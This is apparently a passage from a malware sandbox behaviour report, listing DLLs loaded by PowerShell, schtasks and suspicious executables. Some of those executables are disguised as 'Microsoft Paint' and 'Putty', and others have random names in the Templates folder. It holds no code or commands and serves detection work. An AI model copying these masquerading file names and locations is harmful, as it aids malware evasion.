Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: shacct.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: idstore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: netfxperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: bitsperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: esentprf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfts.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: utildll.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdtcuiu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdtcprx.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mtxclu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msscntrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfdisk.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wmiclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfnet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: browcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfos.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfproc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sysmain.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: tapiperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: usbperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: tquery.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeSection loaded: secur32.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: apphelp.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: version.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edgegdi.dll
